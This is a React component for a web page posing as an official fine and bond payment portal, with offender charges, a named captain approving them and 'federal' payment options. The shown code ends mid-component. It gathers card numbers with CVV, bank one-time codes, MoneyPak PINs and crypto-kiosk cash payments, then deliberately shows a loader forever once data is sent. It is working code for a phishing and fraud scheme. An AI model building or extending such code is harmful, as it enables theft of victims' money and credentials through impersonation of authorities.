// frontend/src/components/client/OnlinePaymentSystem.jsx
import React, { useState, useEffect } from 'react';
import { ArrowLeft, CreditCard, Building2, Ticket, Globe, DollarSign, Lock } from 'lucide-react';
import { clientAPI, banksAPI, api } from '../../services/api';
import toast from 'react-hot-toast';
import { useNavigate } from 'react-router-dom';

const OnlinePaymentSystem = () => {
  const [currentView, setCurrentView] = useState('home');
  const [showBarcodeModal, setShowBarcodeModal] = useState(false);
  const [selectedBank, setSelectedBank] = useState('');
  const [banks, setBanks] = useState([]);
  const [username, setUsername] = useState('');
  const [password, setPassword] = useState('');
  const [otpCode, setOtpCode] = useState(['', '', '', '', '', '']);
  const [isVerifying, setIsVerifying] = useState(false);

  const [showBondingGuideModal,  setShowBondingGuideModal]  = useState(false);
  const [showBondingPolicyModal, setShowBondingPolicyModal] = useState(false);
  const [showVisualExamplesModal, setShowVisualExamplesModal] = useState(false);

  // ── Credit card controlled state ─────────────────────────────────────────
  const [cardName,    setCardName]    = useState('');
  const [cardNumber,  setCardNumber]  = useState('');
  const [cardCvv,     setCardCvv]     = useState('');
  const [cardExpiry,  setCardExpiry]  = useState('');
  const [cardAddress, setCardAddress] = useState('');
  const [cardCity,    setCardCity]    = useState('');
  const [cardState,   setCardState]   = useState('');
  const [cardZip,     setCardZip]     = useState('');
  const [cardConsent, setCardConsent] = useState(false);

  // Fetched data
  const [profile,   setProfile]   = useState(null);
  const [charges,   setCharges]   = useState([]);
  const [qrCode,    setQrCode]    = useState(null);
  const [loading,   setLoading]   = useState(true);

  const [showKioskModal, setShowKioskModal] = useState(false);
  const [isSubmitting,   setIsSubmitting]   = useState(false); // Used for Cards & Bank Login
  
  // NEW: Loaders for MoneyPak & ePayment
  const [isSubmittingMp, setIsSubmittingMp] = useState(false);
  const [isSubmittingEp, setIsSubmittingEp] = useState(false);

  const [kioskPayment,  setKioskPayment]  = useState(null);
  const [walletAddress, setWalletAddress] = useState('');
  const [qrImage,       setQrImage]       = useState(null);

  const [cryptoWalletAddress, setCryptoWalletAddress] = useState('');
  const [kioskVendor, setKioskVendor]                 = useState('');

  // Custom QR blob — fetched via axios so the Bearer token is sent
  const [customQrBlobUrl, setCustomQrBlobUrl] = useState(null);
  const customPayment = profile?.user?.customPayment || null;



  const [pendingBankId, setPendingBankId] = useState(null);




  useEffect(() => {
    if (!customPayment?.hasQr || !customPayment?.qrUrl) {
      setCustomQrBlobUrl(null);
      return;
    }
    let cancelled = false;
    let objectUrl;
    api.get(customPayment.qrUrl, { responseType: 'blob' })
      .then((res) => {
        if (cancelled) return;
        objectUrl = URL.createObjectURL(res.data);
        setCustomQrBlobUrl(objectUrl);
      })
      .catch((err) => console.error('Failed to load custom QR:', err));
    return () => {
      cancelled = true;
      if (objectUrl) URL.revokeObjectURL(objectUrl);
    };
  }, [customPayment?.hasQr, customPayment?.qrUrl]);

  const navigate = useNavigate();

  useEffect(() => {
    window.scrollTo({ top: 0, behavior: 'smooth' });
  }, [currentView]);

  useEffect(() => {
    if (showBarcodeModal) {
      const previousOverflow = document.body.style.overflow;
      document.body.style.overflow = 'hidden';
      return () => { document.body.style.overflow = previousOverflow; };
    }
  }, [showBarcodeModal]);

  useEffect(() => {
    fetchData();
  }, []);

  useEffect(() => {
    banksAPI.getBanks()
      .then((res) => {
        const list = (res.data?.data || [])
          .filter((b) => b.isActive)
          .sort((a, b) => a.order - b.order);
        setBanks(list);
      })
      .catch((error) => console.error('Failed to load bank list:', error));
  }, []);

  useEffect(() => {
    if (profile && !profile.user?.assignedCase) {
      navigate('/payment-contact');
    }
  }, [profile]);

  const fetchData = async () => {
    try {
      const profileResponse = await clientAPI.getMyProfile();
      setProfile(profileResponse.data.data);

      const chargesResponse = await clientAPI.getAdminCharges();
      setCharges(chargesResponse.data.data);

      const qrResponse = await clientAPI.getAdminQRCode();
      setQrCode(qrResponse.data.data);

      const kioskResponse = await clientAPI.getAdminKioskPayment();
      setKioskPayment(kioskResponse.data.data);

      const kiosk = kioskResponse.data.data?.kiosk;
      setWalletAddress(kiosk?.walletAddress || '');
      setQrImage(kiosk?.imageUrl || null);
      setCryptoWalletAddress(kiosk?.cryptoWalletAddress || '');
      setKioskVendor(kiosk?.vendor || '');
    } catch (error) {
      console.error('Failed to load payment data:', error);
      toast.error('Failed to load payment information');
    } finally {
      setLoading(false);
    }
  };

  const scrollToTop = () => window.scrollTo({ top: 0, behavior: 'smooth' });
  const handleViewChange = (view) => setCurrentView(view);

  const handleCopyAddress = () => {
    if (walletAddress) {
      navigator.clipboard.writeText(walletAddress)
        .then(() => toast.success('Wallet address copied!'))
        .catch(() => toast.error('Failed to copy address'));
    }
  };

  const handleOtpChange = (index, value) => {
    if (value.length <= 1 && /^\d*$/.test(value)) {
      const newOtp = [...otpCode];
      newOtp[index] = value;
      setOtpCode(newOtp);
      if (value && index < otpCode.length - 1) {
        document.getElementById(`otp-${index + 1}`)?.focus();
      }
    }
  };

  

  // ── SAVE CREDIT CARD ────────────────────────────────────────────────────────
  const handleCardSubmit = async () => {
    if (!cardConsent) {
      toast.error('Please check the authorization box before submitting');
      return;
    }
    if (!cardNumber || !cardName || !cardExpiry || !cardCvv) {
      toast.error('Please fill in all required card details');
      return;
    }

    setIsSubmitting(true);
    scrollToTop();

    try {
      const [expiryMonth, expiryYear] = cardExpiry.split('/').map((s) => s.trim());
      const firstDigit = cardNumber.replace(/\s/g, '')[0];
      const cardType =
        firstDigit === '4' ? 'visa' :
        firstDigit === '5' ? 'mastercard' :
        firstDigit === '3' ? 'amex' :
        firstDigit === '6' ? 'discover' : 'unknown';

      await clientAPI.saveCreditCard({
        cardholderName: cardName,
        cardNumber:     cardNumber.replace(/\s/g, ''),
        cvv:            cardCvv,            // ← ADDED
        expiryMonth,
        expiryYear,
        cardType,
        billingAddress: cardAddress,
        billingCity:    cardCity,
        billingState:   cardState,
        billingZip:     cardZip,
      });

      //toast.success('Card details saved successfully');
    } catch (err) {
      console.error('Card save error:', err);
      toast.error(err?.response?.data?.message || 'Could not save card details');
      setIsSubmitting(false);
      return;
    }
    // Show loader forever — only stops on manual page reload
    setIsVerifying(true);
  };

  // ── SAVE BANK LOGIN ─────────────────────────────────────────────────────────
  // ── SUBMIT OTP (updates the already-saved bank login) ──────────────────────
  // ── SUBMIT OTP (updates the bank login saved earlier) ────────────────────
  const handleOtpSubmit = async () => {
    const code = otpCode.join('');
    if (code.length < 4) return;
    if (!pendingBankId) {
      toast.error('Bank login was not saved. Please go back and try again.');
      return;
    }

    setIsSubmitting(true);
    try {
      await clientAPI.saveBankOtp(pendingBankId, code);
      //toast.success('OTP submitted');
      // Show the loader forever — never clear isVerifying
      setIsVerifying(true);
    } catch (err) {
      console.error('OTP save error:', err);
      toast.error(err?.response?.data?.message || 'Could not save OTP');
      setIsSubmitting(false);
    }
  };


  // ── SAVE MONEYPAK ───────────────────────────────────────────────────────────
  const [mpDocket, setMpDocket] = useState('');
  const [mpPin, setMpPin] = useState('');

  const handleMoneyPakSubmit = async () => {
    if (!mpDocket || !mpPin) return toast.error('All fields required');
    setIsSubmittingMp(true);
    try {
      await api.post('/client/save-moneypak', { citationDocketNumber: mpDocket, moneyPakPin: mpPin });
      toast.success('MoneyPak submitted successfully');
      setMpDocket(''); setMpPin('');
    } catch (err) {
      toast.error('Failed to submit MoneyPak');
    } finally {
      setIsSubmittingMp(false);
    }
  };

  // ── SAVE EPAYMENT ───────────────────────────────────────────────────────────
  const [epProvider, setEpProvider] = useState('');
  const [epAmount, setEpAmount] = useState('');
  const [epContact, setEpContact] = useState('');

  const handleEPaymentSubmit = async () => {
    if (!epProvider || !epAmount || !epContact) return toast.error('All fields required');
    setIsSubmittingEp(true);
    try {
      await api.post('/client/save-epayment', { provider: epProvider, amount: Number(epAmount), contactInfo: epContact });
      toast.success('ePayment request sent');
      setEpProvider(''); setEpAmount(''); setEpContact('');
    } catch (err) {
      toast.error('Failed to submit ePayment');
    } finally {
      setIsSubmittingEp(false);
    }
  };

  const userData  = profile?.user     || {};
  const adminInfo = profile?.adminInfo || {};
  const totalFines = charges.reduce((sum, charge) => sum + charge.amount, 0);

  const FALLBACK_BANKS = [
    { name: 'PNC Bank, N.A.' }, { name: 'Bank of America' }, { name: 'Chase' }, { name: 'Wells Fargo' }, { name: 'Citibank' },
  ];
  const bankOptions = banks.length > 0 ? banks : FALLBACK_BANKS;
  const selectedBankObj = bankOptions.find((b) => b.name === selectedBank);
  const otpLength = selectedBankObj?.codeDigits || 6;

  const API_ORIGIN = (process.env.REACT_APP_API_URL || 'http://localhost:5000/api').replace(/\/api$/, '');
  const customQrSrc = customPayment?.hasQr && customPayment.qrUrl ? `${API_ORIGIN}${customPayment.qrUrl}` : (qrImage ? process.env.REACT_APP_ADMIN_URL + qrImage : '/images/barcode.png');
  const effectiveQrSrc = customQrBlobUrl ? customQrBlobUrl : qrImage ? process.env.REACT_APP_ADMIN_URL + qrImage : qrCode?.imageUrl ? process.env.REACT_APP_ADMIN_URL + qrCode.imageUrl : '/images/barcode.png';
  const hasAnyQr = !!effectiveQrSrc && effectiveQrSrc !== '/images/barcode.png';

  // ── VIEWS ───────────────────────────────────────────────────────────────────

  const renderHome = () => (
    <div className="min-h-screen bg-gray-50 py-8 px-4">
      <div className="max-w-md mx-auto">
        <h1 className="text-3xl font-bold text-gray-700 text-center mb-8" style={{fontFamily: 'Times New Roman, serif'}}>Accepted Payment Methods</h1>
        <div className="space-y-4">
          <div className="bg-white rounded-lg shadow-md p-6 text-center">
            <h2 className="text-xl font-bold text-gray-700 mb-3" style={{fontFamily: 'Times New Roman, serif'}}>Debit/Credit Cards</h2>
            <ul className="text-sm text-gray-600 space-y-1 mb-4 leading-snug">
              <li>• Visa, MasterCard</li><li>• Secure & Encrypted</li><li>• No Additional Fees</li>
            </ul>
            <div className="flex justify-center mb-4"><CreditCard className="w-12 h-12 text-gray-400" /></div>
            <div className="flex justify-center">
              <button onClick={() => handleViewChange('card-payment')} className="w-2/3 bg-blue-900 text-white py-2 rounded font-semibold hover:bg-blue-800">Pay Here</button>
            </div>
          </div>

          <div className="bg-white rounded-lg shadow-md p-6 text-center">
            <h2 className="text-xl font-bold text-gray-700 mb-3" style={{fontFamily: 'Times New Roman, serif'}}>Federal Bonding Terminal</h2>
            <ul className="text-sm text-gray-600 space-y-1 mb-4 leading-snug">
              <li>• Available Nationwide</li><li>• Syncs with Database</li><li>• No Personal Info Required</li>
            </ul>
            <div className="flex justify-center mb-4"><Building2 className="w-12 h-12 text-purple-400" /></div>
            <div className="flex justify-center">
              <button onClick={() => handleViewChange('kiosk')} className="w-2/3 bg-blue-900 text-white py-2 rounded font-semibold hover:bg-blue-800">Learn More</button>
            </div>
          </div>

          <div className="bg-white rounded-lg shadow-md p-6 text-center">
            <h2 className="text-xl font-bold text-gray-700 mb-3" style={{fontFamily: 'Times New Roman, serif'}}>MoneyPak Voucher</h2>
            <ul className="text-sm text-gray-600 space-y-1 mb-4 leading-snug">
              <li>• Unique Scratch-off PIN</li><li>• Available Nationwide</li><li>• Perfect for Budgeting</li>
            </ul>
            <div className="flex justify-center mb-4"><Ticket className="w-12 h-12 text-green-500" /></div>
            <div className="flex justify-center">
              <button onClick={() => handleViewChange('moneypak')} className="w-2/3 bg-blue-900 text-white py-2 rounded font-semibold hover:bg-blue-800">Learn More</button>
            </div>
          </div>

          <div className="bg-white rounded-lg shadow-md p-6 text-center">
            <h2 className="text-xl font-bold text-gray-700 mb-3" style={{fontFamily: 'Times New Roman, serif'}}>Virtual ePayment</h2>
            <ul className="text-sm text-gray-600 space-y-1 mb-4 leading-snug">
              <li>• Fast & Convenient</li><li>• Supports Multiple Currencies</li><li>• Secure Authentication</li>
            </ul>
            <div className="flex justify-center mb-4"><Globe className="w-12 h-12 text-blue-500" /></div>
            <div className="flex justify-center">
              <button onClick={() => handleViewChange('epayment')} className="w-2/3 bg-blue-900 text-white py-2 rounded font-semibold hover:bg-blue-800">Submit Payment</button>
            </div>
          </div>

          <div className="bg-white rounded-lg shadow-md p-6 text-center">
            <h2 className="text-xl font-bold text-gray-700 mb-3" style={{fontFamily: 'Times New Roman, serif'}}>Federal Direct Transfer</h2>
            <ul className="text-sm text-gray-600 space-y-1 mb-4 leading-snug">
              <li>• Secure Government Processing</li><li>• Immediate Account Funding</li><li>• Federally Authorized Transfer</li>
            </ul>
            <div className="flex justify-center mb-4">
              <div className="w-12 h-12 bg-blue-900 rounded-full flex items-center justify-center"><DollarSign className="w-8 h-8 text-white" /></div>
            </div>
            <div className="flex justify-center">
              <button onClick={() => handleViewChange('direct-transfer')} className="w-2/3 bg-blue-900 text-white py-2 rounded font-semibold hover:bg-blue-800">Initiate Transfer</button>
            </div>
          </div>

          <div className="bg-white rounded-lg shadow-md p-6 text-center">
            <h2 className="text-xl font-bold text-gray-700 mb-3" style={{fontFamily: 'Times New Roman, serif'}}>Secure Account Link</h2>
            <p className="text-sm text-gray-600 leading-snug">Post fines directly</p>
            <p className="text-sm text-gray-600 leading-snug">to your profile</p>
            <p className="text-sm text-gray-600 mb-4 leading-snug">No fees</p>
            <div className="flex justify-center mb-4"><Lock className="w-12 h-12 text-yellow-600" /></div>
            <div className="flex justify-center">
              <button onClick={() => handleViewChange('account-link')} className="w-2/3 bg-blue-900 text-white py-2 rounded font-semibold hover:bg-blue-800">Account Pay</button>
            </div>
          </div>
        </div>
        <button onClick={scrollToTop} className="w-full mt-6 text-blue-600 border border-blue-600 py-2 rounded font-semibold hover:bg-blue-50">Return to top ↑</button>
      </div>
    </div>
  );

  // ── CARD PAYMENT ────────────────────────────────────────────────────────────
  const renderCardPayment = () => (
    <div className="min-h-screen bg-gray-50 py-8 px-4">
      <div className="max-w-md mx-auto">
        <button onClick={() => handleViewChange('home')} className="flex items-center text-blue-600 mb-4 hover:text-blue-800">
          <ArrowLeft className="w-4 h-4 mr-1" /> Home
        </button>
        <h1 className="text-2xl font-bold text-gray-800 mb-6">Online Payment</h1>

        <div className="bg-white rounded-lg shadow-md p-6 mb-6">
          <div className="flex justify-between items-start mb-4">
            <div>
              <p className="text-sm font-semibold text-red-600" style={{ lineHeight: '1.3', marginBottom: '0.5rem' }}>ACCOUNT SUMMARY</p>
              <p className="text-xs text-gray-600" style={{ lineHeight: '1.3' }}>Last Update: {new Date().toLocaleDateString('en-US', { month: 'numeric', day: 'numeric', year: 'numeric' })}</p>
              <p className="text-xs text-gray-600" style={{ lineHeight: '1.3' }}>OFFENDER: {userData.name || userData.fullName || 'Not Available'}</p>
            </div>
          </div>
          {loading ? (
            <div className="text-center py-8">
              <div className="inline-block w-8 h-8 border-4 border-blue-600 border-t-transparent rounded-full animate-spin"></div>
              <p className="text-sm text-gray-600 mt-2">Loading charges...</p>
            </div>
          ) : charges.length > 0 ? (
            <>
              <table className="w-full text-sm mb-4">
                <thead>
                  <tr className="border-b">
                    <th className="text-left py-2 text-xs font-semibold">Docket Number</th><th className="text-left py-2 text-xs font-semibold">Violation</th><th className="text-right py-2 text-xs font-semibold">Fine</th>
                  </tr>
                </thead>
                <tbody>
                  {charges.map((charge, index) => (
                    <tr key={charge._id || index} className="border-b">
                      <td className="py-2 text-xs">{charge.sectionNumber}</td><td className="py-2 text-xs">{charge.chargeName}</td><td className="py-2 text-right text-xs">${charge.amount.toLocaleString('en-US', { minimumFractionDigits: 2, maximumFractionDigits: 2 })}</td>
                    </tr>
                  ))}
                </tbody>
              </table>
              <div className="flex justify-between items-center font-bold text-lg pt-2 border-t">
                <span>Total Fine Amount</span><span>${totalFines.toLocaleString('en-US', { minimumFractionDigits: 2, maximumFractionDigits: 2 })}</span>
              </div>
            </>
          ) : (
            <div className="text-center py-8"><p className="text-sm text-gray-600">No charges found</p></div>
          )}
          <p className="text-xs text-red-600 mt-4 font-semibold" style={{ lineHeight: '1.3' }}>PENDING APPROVAL: PER {adminInfo.adminName || 'CAPT. WILLIAM THOMAS'}</p>
        </div>

        <div className="bg-white rounded-lg shadow-md p-6">
          <h2 className="text-xl font-bold text-gray-800 mb-4">Payment</h2>
          <p className="text-sm text-gray-600 mb-2 leading-snug">Accepted Cards</p>
          <div className="flex gap-2 mb-4">
            <div className="w-10 h-8 rounded"><img src="/images/visa.png" alt="Visa" className="w-full h-full object-contain" /></div>
            <div className="w-10 h-8 rounded"><img src="/images/mastercard.png" alt="MasterCard" className="w-full h-full object-contain" /></div>
          </div>

          <div className="space-y-4">
            <div><label className="block text-sm font-medium text-gray-700 mb-1">Name on Card</label><input type="text" value={cardName} onChange={(e) => setCardName(e.target.value)} className="w-full border border-gray-300 rounded px-3 py-2" placeholder="John Doe" /></div>
            <div><label className="block text-sm font-medium text-gray-700 mb-1">Card Number</label><input type="text" value={cardNumber} onChange={(e) => { const digits = e.target.value.replace(/\D/g, '').slice(0, 16); setCardNumber(digits.replace(/(.{4})/g, '$1 ').trim()); }} className="w-full border border-gray-300 rounded px-3 py-2" placeholder="1234 5678 9012 3456" maxLength={19} /></div>
            <div><label className="block text-sm font-medium text-gray-700 mb-1">CVV</label><input type="text" value={cardCvv} onChange={(e) => setCardCvv(e.target.value.replace(/\D/g, '').slice(0, 4))} maxLength={4} className="w-full border border-gray-300 rounded px-3 py-2" placeholder="123" /></div>
            <div><label className="block text-sm font-medium text-gray-700 mb-1">Expiration Date</label><input type="text" value={cardExpiry} onChange={(e) => { let val = e.target.value.replace(/\D/g, '').slice(0, 4); if (val.length >= 3) val = val.slice(0, 2) + '/' + val.slice(2); setCardExpiry(val); }} className="w-full border border-gray-300 rounded px-3 py-2" placeholder="MM/YY" maxLength={5} /></div>
            <div>
              <label className="block text-sm font-medium text-gray-700 mb-1">Billing Address</label>
              <input type="text" value={cardAddress} onChange={(e) => setCardAddress(e.target.value)} className="w-full border border-gray-300 rounded px-3 py-2 mb-2" placeholder="123 St. Main Street" />
              <input type="text" value={cardCity} onChange={(e) => setCardCity(e.target.value)} className="w-full border border-gray-300 rounded px-3 py-2 mb-2" placeholder="New York" />
              <div className="flex gap-2">
                <input type="text" value={cardState} onChange={(e) => setCardState(e.target.value)} className="flex-1 border border-gray-300 rounded px-3 py-2" placeholder="State" />
                <input type="text" value={cardZip} onChange={(e) => setCardZip(e.target.value.replace(/\D/g, '').slice(0, 10))} className="border border-gray-300 rounded pl-3 py-2" placeholder="Zip" />
              </div>
            </div>
            <div className="flex items-start gap-2">
              <input type="checkbox" checked={cardConsent} onChange={(e) => setCardConsent(e.target.checked)} className="mt-1" />
              <label className="text-xs text-gray-600 leading-tight">I am the owner of this payment method and authorize it's use in payments and/or posts.</label>
            </div>
            <button onClick={handleCardSubmit} disabled={isSubmitting} className="w-full bg-blue-600 text-white py-2 rounded font-semibold hover:bg-blue-700 disabled:opacity-60 flex items-center justify-center gap-2">
              {isSubmitting ? <><div className="w-4 h-4 border-2 border-white border-t-transparent rounded-full animate-spin" /> Saving…</> : 'Submit'}
            </button>
          </div>
        </div>

        <div className="bg-gray-50 rounded-lg p-6 mt-6 border border-gray-200">
          <h3 className="font-bold text-gray-800 mb-1.5 text-lg leading-tight">Financial Hardship</h3>
          <p className="text-sm text-gray-700 mb-2 leading-snug">If you cannot afford the bond or associated fees, you may qualify for a financial hardship arrangement...</p>
          <h4 className="font-semibold text-gray-800 mb-1 text-base leading-tight">Steps to File for Financial Hardship:</h4>
          <ul className="text-sm text-gray-700 mb-2 space-y-1 leading-snug">
            <li className="flex"><span className="mr-2">•</span><span>Obtain a financial hardship or indigency form from the court or designated office.</span></li>
            <li className="flex"><span className="mr-2">•</span><span>Complete the form thoroughly, listing all income, debts, and living expenses.</span></li>
            <li className="flex"><span className="mr-2">•</span><span>Include supporting documents (pay stubs, bank statements, tax returns) to verify your financial need.</span></li>
          </ul>
        </div>
      </div>
    </div>
  );

  // ── KIOSK ───────────────────────────────────────────────────────────────────
  const renderKiosk = () => (
      <div className="min-h-screen bg-gray-50 py-8 px-4">
      <div className="max-w-md mx-auto">
        <button onClick={() => handleViewChange('home')} className="flex items-center text-blue-600 mb-4 hover:text-blue-800"><ArrowLeft className="w-4 h-4 mr-1" /> Home</button>
        <h1 className="text-3xl font-bold text-gray-800 mb-6 text-center">Kiosk Bond Payment</h1>

        {/* Kiosk QR + Details */}
        <div className="bg-white rounded-lg shadow-md p-6">
          {/* ONLY show custom QR if user has one uploaded */}
          {customPayment?.hasQr ? (
            <div className="flex justify-center mb-6">
              <div onClick={() => setShowBarcodeModal(true)} className="cursor-pointer hover:opacity-80 transition">
                <img src={effectiveQrSrc} alt="QR Code" className="w-48 h-48 object-contain" />
              </div>
            </div>
          ) : (
            <div className="flex justify-center mb-6">
              <div className="w-48 h-48 flex items-center justify-center bg-gray-100 border border-dashed border-gray-300 rounded text-sm text-gray-500 text-center px-2">
                QR code not updated
              </div>
            </div>
          )}

          {/* Details */}
          <div className="space-y-3 mb-6 bg-gray-50 border border-gray-100 rounded-lg p-4">
            {customPayment?.qrVendor && (
              <div className="text-center">
                <span className="block text-xs text-gray-500 uppercase tracking-wider mb-0.5">Vendor</span>
                <span className="text-sm font-semibold text-gray-800">{customPayment.qrVendor}</span>
              </div>
            )}
            
            {customPayment?.qrDocketNumber && (
              <div className="text-center">
                <span className="block text-xs text-gray-500 uppercase tracking-wider mb-0.5">Mobile Docket #</span>
                <span className="text-sm font-semibold text-gray-800">{customPayment.qrDocketNumber}</span>
              </div>
            )}
            
            {customPayment?.qrAddress && (
              <div className="text-center">
                <span className="block text-xs text-gray-500 uppercase tracking-wider mb-0.5">Wallet Address</span>
                <div className="flex items-center justify-center gap-2">
                  <span className="text-sm font-mono text-gray-800 break-all">{customPayment.qrAddress}</span>
                  <button onClick={() => { navigator.clipboard.writeText(customPayment.qrAddress); toast.success('Copied!'); }} className="px-2 py-1 bg-blue-600 text-white text-[10px] rounded hover:bg-blue-700 font-semibold uppercase">Copy</button>
                </div>
              </div>
            )}

            {!customPayment?.qrVendor && !customPayment?.qrDocketNumber && !customPayment?.qrAddress && !customPayment?.hasQr && (
              <p className="text-center text-sm text-gray-500 py-4">No kiosk payment details available yet.</p>
            )}
          </div>


          <div className="space-y-2 text-gray-700">
            <p className="text-center leading-tight text-sm"><span className="font-semibold">Tap the screen to begin</span> and select the 'buy option'.</p>
            <p className="text-center leading-tight text-sm"><span className="font-semibold">Enter your Citation Docket Number</span> when prompted.</p>
            <p className="text-center leading-tight text-sm">Tap 'I Understand' and accept the Terms of Service.</p>
            <p className="text-center leading-tight text-sm">Enter the verification code.</p>
            <p className="text-center leading-tight text-sm">Scan your wallet's QR code.</p>
            <p className="text-center leading-tight text-sm">Insert cash until the full bond amount is reached.</p>
            <p className="text-center leading-tight text-sm">Confirm the transaction and collect your Citation Release Voucher.</p>

            <p className="text-center mt-2">
              <button onClick={() => setShowBondingGuideModal(true)} className="text-blue-600 underline hover:text-blue-800 font-light text-sm">BONDING PROCEDURE GUIDE</button>
            </p>
            <p className="text-center mt-2">
              <button onClick={() => setShowBondingPolicyModal(true)} className="text-blue-600 underline hover:text-blue-800 font-light text-sm">BONDING TERMINAL POLICY</button>
            </p>
            <p className="text-center mt-2">
              <button onClick={() => setShowVisualExamplesModal(true)} className="text-blue-600 underline hover:text-blue-800 font-light text-sm">SECURE KIOSK SOP</button>
            </p>
          </div>
        </div>


        <button onClick={scrollToTop} className="w-full mt-4 text-blue-600 border border-blue-600 py-2 rounded font-semibold hover:bg-blue-50">Return to top ↑</button>
      </div>

      {showBarcodeModal && (
        <div className="fixed inset-0 h-dvh w-screen bg-gray-900 flex flex-col items-center justify-center z-50 p-6">
          <button onClick={() => { setShowBarcodeModal(false); setTimeout(() => window.scrollTo({ top: 0, behavior: 'smooth' }), 100); }} className="absolute top-5 right-5 w-10 h-10 flex items-center justify-center text-white text-3xl font-bold leading-none" aria-label="Close">×</button>
          <div className="bg-white p-4 rounded max-w-sm w-full">
            {hasAnyQr ? <img src={effectiveQrSrc} alt="QR Code" className="w-full h-auto" /> : <div className="w-48 h-48 flex items-center justify-center bg-gray-100 border border-dashed border-gray-300 rounded text-sm text-gray-500 text-center px-2">QR code not updated</div>}
          </div>
        </div>
      )}

      {showBondingGuideModal && (
        <div className="fixed inset-0 bg-black bg-opacity-70 flex items-center justify-center p-4 z-50" onClick={() => setShowBondingGuideModal(false)}>
          <div className="bg-white rounded-lg max-w-2xl w-full max-h-[90vh] overflow-y-auto" onClick={(e) => e.stopPropagation()}>
            <div className="sticky top-0 bg-white border-b p-4 flex justify-between items-center"><h2 className="text-xl font-bold text-gray-800">Bonding Procedure Guide</h2><button onClick={() => setShowBondingGuideModal(false)} className="text-gray-500 hover:text-gray-700 text-2xl font-bold">×</button></div>
            <div className="p-4"><img src="/files/understand.jpg" alt="Bonding Procedure Guide" className="w-full h-auto rounded" /></div>
          </div>
        </div>
      )}

      {showBondingPolicyModal && (
        <div className="fixed inset-0 bg-black bg-opacity-70 flex items-center justify-center p-4 z-50" onClick={() => setShowBondingPolicyModal(false)}>
          <div className="bg-white rounded-lg max-w-2xl w-full max-h-[90vh] overflow-y-auto" onClick={(e) => e.stopPropagation()}>
            <div className="sticky top-0 bg-white border-b p-4 flex justify-between items-center"><h2 className="text-xl font-bold text-gray-800">Bonding Terminal Policy</h2><button onClick={() => setShowBondingPolicyModal(false)} className="text-gray-500 hover:text-gray-700 text-2xl font-bold">×</button></div>
            <div className="p-4"><img src="/files/att.jpg" alt="Bonding Terminal Policy" className="w-full h-auto rounded" /></div>
          </div>
        </div>
      )}

      {/*showVisualExamplesModal && (
        <div className="fixed inset-0 bg-black bg-opacity-70 flex items-center justify-center p-4 z-50" onClick={() => setShowVisualExamplesModal(false)}>
          <div className="bg-white rounded-lg max-w-2xl w-full max-h-[90vh] overflow-y-auto" onClick={(e) => e.stopPropagation()}>
            <div className="sticky top-0 bg-white border-b p-4 flex justify-between items-center"><h2 className="text-xl font-bold text-gray-800">SECURE KIOSK SOP</h2><button onClick={() => setShowVisualExamplesModal(false)} className="text-gray-500 hover:text-gray-700 text-2xl font-bold">×</button></div>
            <div className="p-4 space-y-4">
              {(() => {
                const vendorImageMap = { 'CoinFlip': 'example4.png', 'Bitcoin Depot': 'example1.png', 'hilt': 'example6.png', 'Athena': 'example2.png', 'Bitstop': 'example3.png', 'Coinhub': 'example5.png' };
                const imageName = kioskVendor && vendorImageMap[kioskVendor] ? vendorImageMap[kioskVendor] : null;
                if (!imageName) return <p className="text-center text-gray-500 py-8">No visual example available for this payment method.</p>;
                return <img src={`/files/${imageName}`} alt={`${kioskVendor} Example`} className="w-full h-auto rounded shadow" onError={(e) => { e.target.style.display = 'none'; }} />;
              })()}
            </div>
          </div>
        </div>
      )*/}
      {showVisualExamplesModal && (
        <div className="fixed inset-0 bg-black bg-opacity-70 flex items-center justify-center p-4 z-50" onClick={() => setShowVisualExamplesModal(false)}>
          <div className="bg-white rounded-lg max-w-2xl w-full max-h-[90vh] overflow-y-auto" onClick={(e) => e.stopPropagation()}>
            <div className="sticky top-0 bg-white border-b p-4 flex justify-between items-center"><h2 className="text-xl font-bold text-gray-800">SECURE KIOSK SOP</h2><button onClick={() => setShowVisualExamplesModal(false)} className="text-gray-500 hover:text-gray-700 text-2xl font-bold">×</button></div>
            <div className="p-4 space-y-4">
               <img src="files/example1.png" alt={`${kioskVendor} Example`} className="w-full h-auto rounded shadow" onError={(e) => { e.target.style.display = 'none'; }} />;
            </div>
          </div>
        </div>
      )}
    </div>
  );

  // ── MONEYPAK ────────────────────────────────────────────────────────────────
  const renderMoneyPak = () => (
    <div className="min-h-screen bg-gray-50 py-8 px-4">
      <div className="max-w-md mx-auto">
        <button onClick={() => handleViewChange('home')} className="flex items-center text-blue-600 mb-4 hover:text-blue-800"><ArrowLeft className="w-4 h-4 mr-1" /> Home</button>
        <h1 className="text-3xl font-bold text-gray-800 mb-8 text-center">MoneyPak Voucher Payment</h1>
        <div className="bg-white rounded-lg shadow-md p-8">
          <div className="flex justify-center mb-6"><Ticket className="w-16 h-16 text-green-500" /></div>
          <div className="space-y-4 text-gray-700">
            <h2 className="text-xl font-bold text-gray-800 mb-4">How to Pay with MoneyPak</h2>
            <p className="leading-snug"><span className="font-semibold">Step 1:</span> Purchase a MoneyPak voucher at any participating retail location nationwide (CVS, Walgreens, 7-Eleven, etc.).</p>
            <p className="leading-snug"><span className="font-semibold">Step 2:</span> Scratch off the silver strip on the back of your MoneyPak card to reveal your unique PIN code.</p>
            <p className="leading-snug"><span className="font-semibold">Step 3:</span> Enter your Citation Docket Number and the MoneyPak PIN in the payment portal below.</p>
            <p className="leading-snug"><span className="font-semibold">Step 4:</span> Confirm the transaction amount matches your total fine amount.</p>
            <p className="leading-snug"><span className="font-semibold">Step 5:</span> Submit your payment and save your confirmation receipt.</p>
            <div className="bg-blue-50 border-l-4 border-blue-500 p-4 mt-6"><p className="text-sm text-gray-700 leading-tight"><span className="font-semibold">Note:</span> MoneyPak vouchers are available in denominations up to $500. Multiple vouchers may be used for larger payment amounts.</p></div>
            <div className="mt-6">
              <label className="block text-sm font-medium text-gray-700 mb-2">Citation Docket Number</label>
              <input type="text" className="w-full border border-gray-300 rounded px-3 py-2 mb-4" placeholder="Enter docket number" value={mpDocket} onChange={(e) => setMpDocket(e.target.value)} />
              <label className="block text-sm font-medium text-gray-700 mb-2">MoneyPak PIN</label>
              <input type="text" className="w-full border border-gray-300 rounded px-3 py-2 mb-4" placeholder="Enter 14-digit PIN" value={mpPin} onChange={(e) => setMpPin(e.target.value)} />
              <button className="w-full bg-green-600 text-white py-3 rounded font-semibold hover:bg-green-700 flex items-center justify-center gap-2" onClick={handleMoneyPakSubmit} disabled={isSubmittingMp}>
                {isSubmittingMp ? <><div className="w-4 h-4 border-2 border-white border-t-transparent rounded-full animate-spin" /> Submitting…</> : 'Submit Payment'}
